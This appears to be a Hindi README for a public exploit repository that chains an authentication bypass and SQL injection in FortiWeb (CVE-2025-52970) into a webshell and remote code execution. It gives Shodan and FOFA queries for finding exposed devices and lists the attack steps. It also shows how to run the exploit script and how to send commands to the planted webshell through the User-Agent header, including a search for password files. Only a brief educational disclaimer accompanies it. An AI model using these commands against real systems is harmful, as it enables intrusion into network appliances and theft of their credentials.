
फोर्टीवेब (CVE-2025-52970) में प्रमाणीकरण बाईपास को SQL इंजेक्शन के साथ जोड़कर वेबशेल अपलोड करने और HTTP हेडर्स के माध्यम से रिमोट कोड एक्जीक्यूशन प्राप्त करने का प्रदर्शन करता है।
यह रिपॉजिटरी FortiWeb में एक प्रमाणीकरण बाईपास प्रदर्शित करता है जिसे दूरस्थ कोड निष्पादन (RCE) प्राप्त करने के लिए श्रृंखलाबद्ध किया जा सकता है।
यह शोषण SQL पेलोड इंजेक्ट करने, एक वेबशेल अपलोड करने और HTTP हेडर के माध्यम से कमांड निष्पादित करने के लिए एक कमजोर एंडपॉइंट का लाभ उठाता है।
⚠️ अस्वीकरण:
यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है।
उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
((FortiWeb)) AND port:("8443")
### FOFA
title="FortiWeb" && port="8443"
### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
CVE: CVE-2025-52970
घटक: FortiWeb Fabric API (/api/fabric/device/status)
प्रभाव: प्रमाणीकरण बाईपास → SQL इंजेक्शन → वेबशेल अपलोड → RCE
वेक्टर: निर्मित Authorization हेडर + SQL इंजेक्शन
अस्थायी SQL तालिका को हटाएं और बनाएं।
वेबशेल पेलोड को भागों में लिखें।
शेल को /cgi-bin/x.cgi पर निर्यात करें।
अनुमतियाँ ट्रिगर करने के लिए सहायक Python स्क्रिप्ट अपलोड करें।
User-Agent हेडर के माध्यम से कमांड भेजकर वेबशेल तक पहुंचें।
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/
3️⃣ वेबशेल के साथ इंटरैक्ट करें
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
